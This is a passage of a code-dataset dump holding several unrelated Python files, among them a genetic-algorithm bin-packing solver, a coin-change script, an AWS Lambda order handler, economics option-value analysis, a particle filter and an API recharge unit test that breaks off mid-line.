fill_cont.PI:\n solution_table.loc[len(solution_table)] = [fill_cont.id, item.id, item.position.x, \n item.position.y, item.position.z,\n item.l, item.w, item.h, item.rotation, item.new_l, item.new_w, item.new_h]\n \n info_table = pd.DataFrame([], columns=['Нижняя граница', 'Число контейнеров', 'Фитнес значение', 'Время работы', \n 'Номер успешной популяции', 'Время на поиски лучшего индивида'])\n info_table.loc[len(info_table)] = [i for i in info]\n \n writer = pd.ExcelWriter(filename + '.xlsx', engine='xlsxwriter') \n solution_table.to_excel(writer, sheet_name='Информация об упаковке') \n info_table.to_excel(writer, sheet_name='Общая информация')\n writer.save()\n \n \ndef LB(IP):\n global L, W, H\n sum_items = 0\n for i in IP:\n sum_items+= i.volume \n return ceil(sum_items/(L * H * W))\n \ndef fitness_value(solution):\n Ncont = len(solution)\n k = L*W*H\n #k = 1000\n left_spaces = [(cont.left_space/k)**2 for cont in solution]\n V = sum(left_spaces)\n return Ncont*k + V\n \n\ndef get_population_fitness_dictionary(population, LB): \n fitness_dict = {}\n for i in range(len(population)):\n list_C = [container(j, L,W,H) for j in range(LB)]\n solution = LLSF(list_C, population[i])\n fitness = fitness_value(solution)\n fitness_dict[i] = fitness\n return fitness_dict\n\n\ndef crossover(population_fitness_dictionary, population):\n def get_probability_list(population_fitness_dictionary, population):\n fitness = population_fitness_dictionary.values()\n total_fit = float(sum(fitness))\n relative_fitness = [f/total_fit for f in fitness]\n probabilities = [sum(relative_fitness[:i+1]) \n for i in range(len(relative_fitness))]\n return probabilities\n\n def roulette_wheel_pop(population, probabilities, number):\n chosen = []\n for n in range(number):\n r = random.random()\n for (i, individual) in enumerate(population):\n if r <= probabilities[i]:\n chosen.append(list(individual))\n break\n return chosen\n \n def get_i_j(max_bound):\n x = random.randint(1, max_bound - 1)\n y = random.randint(x, max_bound)\n return x, y\n\n \n \n def control(child, parent):\n parentp = parent.copy()\n new_child = child.copy()\n for gen in child:\n if gen in parentp:\n parentp.remove(gen)\n else:\n new_child.remove(gen)\n new_child.extend(parentp)\n return new_child\n \n \n \n def get_child(population_fitness_dictionary, population):\n parents = roulette_wheel_pop(population, get_probability_list(population_fitness_dictionary, population), 2)\n first_parent, second_parent = parents[0], parents[1]\n i, j = get_i_j(len(first_parent))\n сhild_first = first_parent.copy()\n сhild_second = second_parent.copy()\n сhild_first[i:j], сhild_second[i:j] = сhild_second[i:j], сhild_first[i:j].copy() #переставили и получили детей\n\n if np.random.choice([0,1], p=[0.99, 0.01]): #мутация \n i, j = get_i_j(len(сhild_first)-1)\n сhild_first[i], сhild_second[j] = сhild_second[j], сhild_first[i]\n\n \n сhild_first = control(сhild_first, first_parent)\n сhild_second = control(сhild_second, second_parent) \n \n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_child_first = fitness_value(LLSF(list_C, сhild_first))\n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_child_second = fitness_value(LLSF(list_C, сhild_second))\n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_first_parent = fitness_value(LLSF(list_C, parents[0]))\n \n list_C = [container(i, L,W,H) for i in range(LoundB)] \n fitness_second_parent = fitness_value(LLSF(list_C, parents[1]))\n \n \n if fitness_child_first>fitness_first_parent and fitness_child_first>fitness_second_parent\\\n\tand fitness_child_second>fitness_first_parent and fitness_child_second>fitness_second_parent:\n return сhild_first, сhild_second\n \n if fitness_first_parent>fitness_child_first and fitness_first_parent>fitness_child_second\\\n\tand fitness_second_parent>fitness_child_first and fitness_second_parent>fitness_child_second:\n return first_parent, second_parent \n \n if fitness_first_parent>fitness_child_second and fitness_first_parent>fitness_second_parent\\\n\tand fitness_child_first>fitness_child_second and fitness_child_first>fitness_second_parent:\n return first_parent, сhild_first\n \n if fitness_first_parent>fitness_second_parent and fitness_first_parent>fitness_child_first\\\n\tand fitness_child_second>fitness_second_parent and fitness_child_second>fitness_child_first:\n return first_parent, сhild_second\n \n if fitness_second_parent>fitness_first_parent and fitness_second_parent>fitness_child_second\\\n\tand fitness_child_first>fitness_first_parent and fitness_child_first>fitness_child_second:\n return second_parent, сhild_first\n \n if fitness_second_parent>fitness_first_parent and fitness_second_parent>fitness_child_first\\\n\tand fitness_child_second>fitness_first_parent and fitness_child_second>fitness_child_first:\n return second_parent, сhild_second\n \n else:\n return сhild_first, сhild_second\n \n new_population = [get_child(population_fitness_dictionary, population) for i in range(5)]\n return list(sum(new_population, ())) \n\n\ndef generation_first_population(sequence, number): \n \n population = [list(np.random.permutation(sequence)) for i in range(number-4)]\n population.append(sorted(sequence, key = lambda pos: (pos.volume), reverse = True))\n population.append(sorted(sequence, key = lambda pos: (pos.h), reverse = True))\n population.append(sorted(sequence, key = lambda pos: (pos.l), reverse = True)) \n population.append(sorted(sequence, key = lambda pos: (pos.w), reverse = True))\n \n return population\n\n\ndef get_key(d, value):\n for k, v in d.items():\n if v == value:\n return k\n \n\ndef drawSolution(solution,filename):\n def drawItem(ax,xx,yy,z,ll,ww, h, color):\n y, x, l, w = xx, yy, ww, ll\n r1 = [0,l]\n r2 = [0,w]\n X, Y = np.meshgrid(r1, r2)\n ax.plot_surface(x+X,y+Y,z, alpha=1, color=color, edgecolor = 'black', linewidth=2) # bottom\n ax.plot_surface(x+X,y+Y,z + h, alpha=1, color=color, edgecolor = 'black', linewidth=2) #top\n\n r3 = [0,l]\n r4 = [0,h]\n X, Y = np.meshgrid(r3, r4)\n ax.plot_surface(x+X,y,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # front\n ax.plot_surface(x+X,y+w,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # back\n\n r5 = [0,w]\n r6 = [0,h]\n X, Y = np.meshgrid(r5, r6)\n ax.plot_surface(x+0,y+X,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # left\n ax.plot_surface(x+l,y+X,z+Y, alpha=1, color=color, edgecolor = 'black', linewidth=2) # right\n \n \n def drawContainer(ax, Cont):\n all_color = ['#F08080', '#DC143C', '#FFB6C1', '#C71585', '#FFA500', '#EEE8AA', '#8A2BE2', '#00008B', '#008000', '#66CDAA']\n\n for item in Cont.PI:\n i = copy.deepcopy(item)\n color = random.choice(all_color) \n drawItem(ax,i.position.x,i.position.y,i.position.z,i.new_l,i.new_w,i.new_h, color)\n \n for C in solution:\n fig = plt.figure()\n fig.suptitle('3D bin packing', fontsize=10, fontweight='bold')\n ax = fig.gca(projection='3d')\n ax.set_xlabel('Y')\n ax.set_ylabel('X')\n ax.set_zlabel('Z')\n \n drawContainer(ax, C)\n ax.set_xlim3d(0, C.L)\n ax.set_ylim3d(C.W, 0)\n ax.set_zlim3d(0, C.H)\n plt.show()\n fig.savefig(filename + str(C.id) + '.png', dpi=500)\n \n \ndef work(filename):\n\t#print(arguments[1])\n\t#filename = arguments[1]\n global L,W,H\n global best_individ\n global best_fit\n time_start = time.time()\n IP = get_collection(filename)\n LoundB = LB(IP)\n population = generation_first_population(IP, 10)\n pop_dict = get_population_fitness_dictionary(population, LoundB)\n best_fit = min(pop_dict.values())\n print(pop_dict)\n print(best_fit)\n\n best_individ = population[get_key(pop_dict, min(pop_dict.values()))]\n list_C = [container(i, L,W,H) for i in range(LoundB)]\n best_sol = LLSF(list_C, best_individ)\n print(len(best_sol))\n time_best = time.time()\n num_best_population = 1\n count_population = 1\n\n if len(best_sol) == LoundB:\n search_time = round(time_best - time_start, 4) \n time_finish = time.time()\n list_C = [container(i, L,W,H) for i in range(LoundB)] \n time_of_work = round(time_finish - time_start, 4)\n best_solution = LLSF(list_C, best_individ)\n info = [LoundB, len(best_solution), best_fit, time_of_work, num_best_population, search_time] \n export_solution(best_solution,filename, info)\n drawSolution(best_solution,filename)\n return best_sol\n else :\n while len(best_sol) != LoundB: \n population = crossover(pop_dict, population)\n count_population +=1\n pop_dict = get_population_fitness_dictionary(population, LoundB) \n if min(pop_dict.values()) < best_fit:\n \n best_fit = min(pop_dict.values())\n best_individ = population[get_key(pop_dict, min(pop_dict.values()))]\n time_best = time.time()\n num_best_population = count_population\n list_C = [container(i, L,W,H) for i in range(LoundB)]\n best_sol = LLSF(list_C, best_individ)\n \n search_time = round(time_best - time_start, 4) \n \n \n \n time_finish = time.time()\n list_C = [container(i, L,W,H) for i in range(LoundB)] \n time_of_work = round(time_finish - time_start, 4)\n best_solution = LLSF(list_C, best_individ)\n info = [LoundB, len(best_solution), best_fit, time_of_work, num_best_population, search_time] \n export_solution(best_solution,filename, info)\n drawSolution(best_solution,filename)\n return best_solution\n\n","sub_path":"BnPmy.py","file_name":"BnPmy.py","file_ext":"py","file_size_in_byte":26677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"98840078","text":"import random\r\nimport CoinCase\r\nimport sys\r\n\r\n# create coin case\r\n# case also dreats a withdrawal amount and mod 5, 10, and 25\r\nCC = CoinCase.CoinCase()\r\n# print case contents\r\nCC.caseContains()\r\n\r\n# print withdrawal amount\r\nprint('Try to withdraw ' + str(CC.withdraw))\r\n\r\n\r\ndef getCoins(): # find solution when perfect solution is an option\r\n holdArray = []\r\n solutionFound = False\r\n while not solutionFound:\r\n if CC.withdraw > 0:\r\n if CC.mod25 != 0 or CC.quarters == 0:\r\n if CC.withdraw >= 50 and CC.quarters > 1:\r\n CC.withdraw -= 50\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n elif CC.withdraw >= 35 and CC.dimes > 0 and CC.quarters > 0 and (checkForPerfectSolution(CC.withdraw - 35)):\r\n CC.withdraw -= 35\r\n holdArray.append('dime')\r\n CC.removeCoin('dime')\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n elif CC.withdraw >= 30 and CC.nickels > 0 and CC.quarters > 0 and (checkForPerfectSolution(CC.withdraw - 30)):\r\n CC.withdraw -= 30\r\n holdArray.append('nickel')\r\n CC.removeCoin('nickel')\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n if CC.mod10 != 0 or CC.dimes == 0:\r\n if CC.mod5 != 0 or CC.nickels == 0:\r\n CC.withdraw -= 1\r\n holdArray.append('penny')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n CC.withdraw -= 5\r\n holdArray.append('nickel')\r\n CC.removeCoin('nickel')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n CC.withdraw -= 10\r\n holdArray.append('dime')\r\n CC.removeCoin('dime')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n CC.withdraw -= 25\r\n holdArray.append('quarter')\r\n CC.removeCoin('quarter')\r\n CC.getMod(CC.withdraw)\r\n continue\r\n else:\r\n solutionFound = True\r\n return [solutionFound, holdArray]\r\n\r\n\r\n# boolean stating whether or not an exact amount is possible\r\nEAB = True\r\n\r\n\r\ndef checkForPerfectSolution(wA): # this function returns EAB ture or false\r\n global EAB\r\n amount = wA\r\n # is there enough to withdraw\r\n if amount > CC.total:\r\n print('Unable to withdraw ' + str(CC.withdraw) +\r\n ' cents. NOT enough money in the piggy bank.')\r\n sys.exit()\r\n else:\r\n # mod 10 check\r\n if CC.mod10 == 0:\r\n # mod 5 check\r\n if CC.mod5 == 0:\r\n EAB = True\r\n else:\r\n # pennies check\r\n if CC.pennies >= CC.mod5:\r\n EAB = True\r\n else:\r\n EAB = False\r\n else:\r\n # mod 5 check\r\n if CC.mod5 == 0:\r\n # pennies check\r\n if CC.pennies >= 5 or CC.nickels > 1:\r\n EAB = True\r\n else:\r\n EAB = False\r\n else:\r\n # pennies check\r\n if CC.pennies >= CC.mod5:\r\n EAB = True\r\n else:\r\n EAB = False\r\n\r\n\r\n# run the check\r\ncheckForPerfectSolution(CC.withdraw)\r\n\r\nif EAB:\r\n solutionFound = getCoins()\r\nelse:\r\n # add one to withdrawal amount until EAB is true, if it isn't already\r\n while not EAB:\r\n CC.withdraw += 1\r\n CC.getMod(CC.withdraw)\r\n checkForPerfectSolution(CC.withdraw)\r\n # get coins if true\r\n solutionFound = getCoins()\r\n\r\n\r\nif solutionFound[0]:\r\n for item in solutionFound[1]:\r\n print(item)\r\n","sub_path":"CoinProblem.py","file_name":"CoinProblem.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"392431414","text":"import json\nimport os\nfrom ordering import place_order\nfrom uuid import uuid4\n\ndef lambda_handler(request, context):\n # validation\n if not 'photos' in request:\n raise Exception('photos needs to be provided')\n \n if not 'email' in request:\n raise Exception('email is required')\n \n if len(request['photos']) <= 1:\n raise Exception('not enough photos selected')\n \n QUEUE_URL = os.getenv('QUEUE_URL')\n place_order(QUEUE_URL, {\n 'email': request['email'],\n 'photos': request['photos'],\n 'request_id': str(uuid4())\n })\n \n return {\n 'statusCode': 200,\n 'body': \"OK\"\n }\n","sub_path":"app-backend/place-order/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"328285617","text":"\"\"\"This module contains auxiliary functions for the analysis in the option value project.\"\"\"\nimport pickle as pkl\nimport shutil\nimport glob\nimport os\n\nimport numpy as np\n\nfrom ov_tools.objects.auxiliary_shared import get_benefits_education\n\nimport respy\n\n\ndef get_option_values_education(period, current_state, config_dict):\n \"\"\"This function calculates the option value.\"\"\"\n scenarios = ['base', 'truncated']\n\n if os.path.exists('option_value_calculation'):\n shutil.rmtree('option_value_calculation')\n os.mkdir('option_value_calculation')\n os.chdir('option_value_calculation')\n\n for scenario in scenarios:\n\n os.mkdir(scenario)\n os.chdir(scenario)\n respy_obj = respy.RespyCls(config_dict['INIT_FILE'])\n\n edu_spec = respy_obj.get_attr('edu_spec')\n\n if scenario in ['base']:\n pass\n elif scenario in ['truncated']:\n edu_spec['max'] = current_state['edu'] + 1\n else:\n raise NotImplementedError\n\n respy_obj.unlock()\n respy_obj.set_attr('edu_spec', edu_spec)\n respy_obj.lock()\n\n respy_obj.write_out('model.respy.ini')\n\n rslt = get_benefits_education(period, current_state, respy_obj)\n\n pkl.dump(rslt, open('rslt_benefits.respy.pkl', 'wb'))\n\n os.chdir('../')\n\n # Now we are ready to compute the option values. There is only a single option value associated\n # with each state, however the option value contribution is actually heterogeneous due to the\n # random shock?!\n ov_calculation, rslt = dict(), dict()\n for scenario in scenarios:\n os.chdir(scenario)\n rslt = pkl.load(open('rslt_benefits.respy.pkl', 'rb'))\n\n ov_calculation[scenario] = rslt['total_values'][:, 2]\n\n os.chdir('../')\n\n rslt['option_values'] = ov_calculation['base'] - ov_calculation['truncated']\n rslt['option_value_contribs'] = rslt['option_values'] / ov_calculation['base']\n\n pkl.dump(rslt, open('rslt_option_values.respy.pkl', 'wb'))\n\n os.chdir('../')\n\n\ndef option_value_analysis(which, period, current_state, config_dict):\n \"\"\"This function allows to analyze the effect of uncertainty and nonlinearities on the option\n value of human capital investment.\"\"\"\n # We need to prepare a sound directory structure.\n dirname = which\n if os.path.exists(dirname):\n shutil.rmtree(dirname)\n\n os.mkdir(dirname)\n os.chdir(dirname)\n\n for i in range(5):\n label = '{}'.format(i)\n os.mkdir(label)\n os.chdir(label)\n\n respy_obj = respy.RespyCls(config_dict['INIT_FILE'])\n\n optim_paras = respy_obj.get_attr('optim_paras')\n\n shocks_cholesky = optim_paras['shocks_cholesky']\n\n if which == 'uncertainty':\n # We first construct the scaled covariance matrix and than integrate it's cholesky\n # factor into the class instance.\n cov = np.matmul(shocks_cholesky, shocks_cholesky.T)\n scaling_matrix = np.identity(4) * (1.00 + i * 0.1)\n cov = np.matmul(np.matmul(scaling_matrix, cov), scaling_matrix.T)\n optim_paras['shocks_cholesky'] = np.linalg.cholesky(cov)\n elif which == 'nonlinearities':\n # We need to specify the grid of coefficient to trace out the effect of nonlinearities.\n optim_paras = respy_obj.get_attr('optim_paras')\n optim_paras['coeffs_a'][6:8] = float('0.0{:}'.format(i))\n optim_paras['coeffs_b'][6:8] = float('0.0{:}'.format(i))\n else:\n raise NotImplementedError\n\n respy_obj.unlock()\n respy_obj.attr['optim_paras'] = optim_paras\n respy_obj.lock()\n\n respy_obj.write_out()\n\n get_option_values_education(period, current_state, config_dict)\n\n os.chdir('../')\n\n os.chdir('../')\n\n _aggregate_results(which)\n\n\ndef _aggregate_results(which):\n \"\"\"This function simply creates an easily accessible *.pkl dictionary with the results for\n further processing.\"\"\"\n cwd = os.getcwd()\n os.chdir(which)\n\n dirnames = glob.glob('*')\n dirnames.sort()\n\n rslt = dict()\n rslt['level'], rslt['option_value'] = [], []\n\n for dirname in dirnames:\n os.chdir(dirname)\n fname = 'option_value_calculation/rslt_option_values.respy.pkl'\n rslt['option_value'] += [pkl.load(open(fname, 'rb'))['option_values'][0]]\n rslt['level'] += [int(dirname)]\n os.chdir('../')\n pkl.dump(rslt, open(which + '.respy.pkl', 'wb'))\n\n os.chdir(cwd)\n\n\ndef dist_input_arguments(parser):\n \"\"\"Check input for estimation script.\"\"\"\n # Parse arguments\n args = parser.parse_args()\n\n # Distribute arguments\n is_debug = args.is_debug\n\n # Check attributes\n assert (is_debug in [True, False])\n\n # Finishing\n return is_debug,\n","sub_path":"ov_tools/objects/auxiliary_option.py","file_name":"auxiliary_option.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"429276072","text":"import csv\nimport numpy as np\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.impute import KNNImputer\nfrom datetime import datetime\nfrom datetime import timedelta as td\n\naodData = np.zeros(365)\npm25Data = np.zeros(365)\ni = 0\n\nwith open('047file.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n value = row[1]\n if value == '':\n aodData[i] = np.nan\n else:\n aodData[i] = value\n i += 1\n#print(aodData)\n\ni = 0\npm25Data[308] = np.nan\nwith open('pm25.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if i > 307:\n pm25Data[i+1] = row[4]\n else:\n pm25Data[i] = row[4]\n # print(row[0])\n # print(row[4])\n # print(i)\n # print(pm25Data[i])\n i += 1\n#print(pm25Data)\n\ncompleteData = np.zeros((365,2))\n#print(completeData)\nfor row in range(0,365):\n completeData[row,0] = aodData[row]\n completeData[row,1] = pm25Data[row]\n\n#print(completeData)\n\nimputer = KNNImputer(n_neighbors=4, weights=\"uniform\")\nimputedData = imputer.fit_transform(completeData)\n\n#print(imputedData)\n\ncurrentDate = datetime.strptime('2010-01-01', '%Y-%m-%d')\nendDate = datetime.strptime('2011-01-01', '%Y-%m-%d')\nf = open('imputed047.csv','w')\nnl = '\\n'\ni = 0\n\nwhile currentDate < endDate:\n f.write(currentDate.strftime('%Y-%m-%d') + ',' + str(imputedData[i,0]) + nl)\n currentDate = currentDate + td(days=1)\n i += 1\n ","sub_path":"analysis/source/Impute.py","file_name":"Impute.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"478752347","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/4/5 22:17\n# @Author : qxm\n# @FileName: exception.py\n\n# try:\n# open(\"abc.txt\",'r') #打开不存在的abc.txt文件\n# except FileNotFoundError: #FileNotFoundError接收没有文件的异常\n# print(\"出现异常了\")\n\n# try:\n# print(a) #打印没有定义的变量a\n# except NameError: #NameError接收没有定义的变量的异常\n# print(\"出现异常了\")\n\n# try:\n# open(\"abc.txt\",'r') #打开不存在的abc.txt文件\n# except BaseException: #BaseException接收所有类型的异常\n# print(\"出现异常了\")\n#\n# try:\n# open(\"abc.txt\",'r') #打开不存在的abc.txt文件\n# except BaseException as msg: #BaseException接收所有类型的异常,定义了msg变量来接收异常信息\n# print(msg)\n#\n# try:\n# open(\"abc.txt\",'r') #打开不存在的abc.txt文件\n# except Exception as msg: #Exception接收所有类型的异常,但继承自BaseExceptio类\n# print(msg)\n\n# try:\n# open(\"abc.txt\",'r') #打开不存在的abc.txt文件\n# except Exception as msg: #Exception接收所有类型的异常,但继承自BaseExceptio类\n# print(msg)\n# else:\n# print('没有异常时执行') #因为上面的代码出现了异常,所以不会执行这行\n\n# try:\n# open(\"abc.txt\",'r') #打开不存在的abc.txt文件\n# except Exception as msg: #Exception接收所有类型的异常,但继承自BaseExceptio类\n# print(msg)\n# finally:\n# print('不管上面是否有异常,都执行这行')\n\n\n#抛出异常\n#定义say_hello()函数\ndef say_hello(name=None):\n if name is None:\n raise Exception('\"name\" cannot be empty') #raise 抛出异常\n else:\n print(\"hello,%r\" +name)\n\nsay_hello() #调用say_hello()函数","sub_path":"chs/chs1/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"245323411","text":"import gym\nimport gym_traffic\nfrom gym.wrappers import Monitor\nimport gym\nimport time\nfrom tqdm import tqdm\nmonitor = False\n#env = gym.make('Traffic-Simple-gui-v0')\n#env = gym.make('Traffic-Simple-cli-v0')\n#env = gym.make('Traffic-DCMed-gui-v0')\n#env = gym.make('Traffic-2way-gui-v0')\n#env = gym.make('Traffic-litteRiver-gui-v0')\nenv = gym.make('Traffic-yIntersection-gui-v0')\n#env = gym.make('Traffic-Simple-gui-v0')\nif monitor:\n env = Monitor(env, \"output/traffic/simple/random\", force=True)\nfor i_episode in tqdm(range(500)):\n observation = env.reset()\n for t in tqdm(range(1000)):\n #env.render()\n #print(observation)\n action = env.env.action_space.sample() # two envs are needed. The first is a time limited wrapper, the second is the actual env.\n #time.sleep(1)\n observation, reward, done, info = env.step(action)\n print(\"Observation: \", end=\"\")\n print(observation[0], end=\" \")\n print(observation[1])\n print(\"Reward: \", end=\"\")\n print(reward)\n print(\"Done: \", end=\"\")\n print(done)\n print(\"Info: \", end=\"\")\n print(info)\n print(\"-------------------------------------------------\")\n #print \"Reward: {}\".format(reward)\n if done:\n #print(\"Episode finished after {} timesteps\".format(t+1))\n break\n","sub_path":"examples/example_gym_traffic_random.py","file_name":"example_gym_traffic_random.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"612022618","text":"import ratings\n\n\nclass Parser:\n\n def __init__(self, url):\n # Global variables\n self.address = url\n self.list = 'leanings.txt'\n self.trusted = ['bbc',\n 'npr',\n 'pbs',\n 'wsj',\n 'abc',\n 'cbs',\n 'nbc',\n 'cnn',\n 'usatoday']\n\n def parse(self):\n # Sends address to recommended and not recommended methods.\n # Returns a recommendation\n r = self.recommended()\n nr = self.not_recommended()\n r_score = r - nr + self.compare_known_sources()\n if r_score > 1:\n return ratings.Ratings.RECOMMENDED\n elif r_score < -1:\n return ratings.Ratings.NOT_RECOMMENDED\n else:\n return ratings.Ratings.UNCERTAIN\n\n def not_recommended(self):\n # Assigns a not_recommended score to a url\n score = 0\n # Check for known urls\n if 'com.co' in self.address:\n score -= 2\n return score\n\n def recommended(self):\n # Assigns a recommended score to a url\n score = 0\n # Check for known urls\n for s in self.trusted:\n if s in self.address:\n score += 1\n return score\n\n def build_leanings_index(self):\n # Returns leanings of known sources\n leanings = []\n filename = self.list\n with open(filename) as inputfile:\n for line in inputfile:\n leanings.append(line.strip().split('\\t'))\n return leanings\n\n def compare_known_sources(self):\n # Returns a -1, 0, or 1 depending on source leanings\n index = self.build_leanings_index()\n for i in index:\n print\n i\n if self.address in i[3]:\n if i[1] is 'Center':\n return 1\n else:\n return -1\n return 0","sub_path":"Backend/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"622514661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 30 17:45:05 2018\n\n@author: hirvoasa\n\"\"\"\nimport numpy as np\nfrom numpy.linalg import inv\nfrom algos.utils import sqrt_svd, SIR_resampling\n\ndef PF(dx, T, dy, xb, B, Q, R, Nf, f, H, obs, prng): \n sqQ = sqrt_svd(Q)\n sqB = sqrt_svd(B)\n Xa = np.zeros([dx, Nf, T+1])\n Xf = np.zeros([dx, Nf, T])\n Xf_for = np.zeros([dx, Nf, T])\n Wa = np.zeros([Nf, T+1])\n Wa[:,0] = 1/Nf*np.ones(Nf) \n # Initialize ensemble\n for i in range(Nf):\n Xa[:,i,0] = xb + sqB.dot(prng.normal(size=dx))\n for t in range(T):\n # Resampling\n ind = SIR_resampling(Wa[:,t])\n # Forecasting\n Xf_for[:,:,t] = f(Xa[:,:,t])\n Xf[:,:,t] = Xf_for[:,ind,t]+ sqQ.dot(prng.normal(size=(dx, Nf)))\n Xa[:,:,t+1] = Xf[:,:,t]\n\n # Weighting\n Y = H.dot(Xa[:,:,t+1]) \n innov = np.tile(obs[:,t], (Nf,1)).T - Y\n logmax = np.max(-.5 *np.sum(innov.T.dot(inv(R))*(innov.T),1)) # for numerical stability\n Wa[:,t+1] = np.exp(-.5 *np.sum(innov.T.dot(inv(R))*(innov.T),1) - logmax)#*Wa_prev\n Wa[:,t+1] = Wa[:,t+1]/np.sum(Wa[:,t+1])\n \n return Xa, Xf, Xf_for, Wa, ind","sub_path":"Particle_lorenz_ext/algos/PF.py","file_name":"PF.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"632891373","text":"#Definition for singly-linked list:\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def reverseList(self, head):\n rev = None #important\n while head: #before reaching the last ->/before reaching the end of the list\n head.next,rev,head = rev,head,head.next #Hanoi Tower converting an -> direction at a time\n return rev #the head of the reversed linkedlist","sub_path":"linkedList.py","file_name":"linkedList.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"87646396","text":"import json\nimport os\nimport unittest\n\nfrom common.db_handler import DBhandler\nfrom common.excel_handler import ExcelHandler\nfrom common.helper import get_mobile\nfrom common.logger_handler import LoggerHandler\nfrom common.requests_handler import RequestHandler\nfrom middleware.helper import save_token, Context\nfrom middleware.yaml_handler import YamlHandler,yaml_data\nfrom config.setting import config\nfrom lib import ddt\nfrom decimal import Decimal\n\n\n\n@ddt.ddt\nclass TestRecharge(unittest.TestCase):\n # def setUp(self) -> None:\n # 读取Excel里数据\n excel_handler=ExcelHandler(config.data_path)\n data=excel_handler.total_test(\"recharge\")\n # 读取yaml里的数据\n # yaml_data =YamlHandler(config.yaml_config_path).yaml_read()\n logger=LoggerHandler(name=yaml_data[\"logger\"][\"name\"],\n level=yaml_data[\"logger\"][\"level\"],\n file=yaml_data[\"logger\"][\"file\"],)\n\n def setUp(self) -> None:\n # 实例化\n self.req=RequestHandler()\n # 一次操作用的是一个db对象,所以放前置条件当中\n self.db=DBhandler(host=yaml_data[\"database\"][\"host\"],\n port=yaml_data[\"database\"][\"port\"],\n password=yaml_data[\"database\"][\"password\"],\n user=yaml_data[\"database\"][\"user\"],\n charset=yaml_data[\"database\"][\"charset\"],\n database=yaml_data[\"database\"][\"database\"])\n # 登录\n # save_token()\n # self.token=Context.token\n # self.member_id=Context.member_id\n\n\n def tearDown(self) -> None:\n # 关闭浏览器\n self.req.close_session()\n self.db.close()\n @ddt.data(*data)\n def test_recharge(self,test_data):\n \"\"\"充值接口\n 1、替换json数据当中member_id\n 2、访问接口,得到实际结果\n 3、断言实际结果,同时需要查数据库里面充值金额是否正确\"\"\"\n # 进行充值时候member_id是动态变化的,amount是规定好的可以写死,headers里需要用登陆时候返回的token:\n # 处理token第一种:在Excel里的headers里,用## 动态生成,然后用replace替换;第二种是在前置条件登陆中拿到token,然后再发送requests请求中的headers上拼接上token\n # 充值之前,查询数据库,获取充值之前的余额\n member_id=Context().member_id\n token=Context().token\n\n sql=\"select * from member where id=%s;\"\n user=self.db.query(sql,args=[member_id])\n before_money=user[\"leave_amount\"]\n\n if \"#member_id#\" in test_data[\"json\"]:\n test_data[\"json\"]=test_data[\"json\"].replace(\"#member_id#\",str(member_id))\n # 错误的用户名用例,只要不要等于当前登录的id就行,可以id+1 +2 都行\n if \"#other_id#\" in test_data[\"json\"]:\n test_data[\"json\"]=test_data[\"json\"].replace(\"#other_id#\",str(member_id+1))\n # 读取Excel中headers,这个得到的是字典\n headers=json.loads(test_data[\"headers\"])\n # 得到Authorization信息头\n headers[\"Authorization\"]=token\n res=self.req.visit(test_data[\"method\"],\n config.host+test_data[\"url\"],\n json=json.loads(test_data[\"json\"]),\n headers=headers)\n print(res)\n\n\n # 获得expected,然后断言\n try:\n self.assertEqual(test_data[\"expected\"],res[\"code\"])\n # 第二次断言,充值成功的用例需要进行数据库校验,金额\n # 判断是否为成功用例,通过返回码判断,如果没有code可以用msg 或者在Excel新增一列tag ,success\n if res[\"code\"]==0:\n # 查看数据库结果,充值之前的金额+ 充值的金额=充值后的金额\n money=json.loads(test_data[\"json\"])[\"amount\"]\n # 获取充值之前的金额:第一种办法是通过save_token返回的leave_amount,这个方法如果是多次充值的时候,会获取失败,为此应该把save_token()放前置条件中,保证每次用例之前都获取一次\n\n sql = \"select * from member where id=%s;\"\n after_user = self.db.query(sql, args=[member_id])\n after_money = after_user[\"leave_amount\"]\n self.assertEqual( before_money + 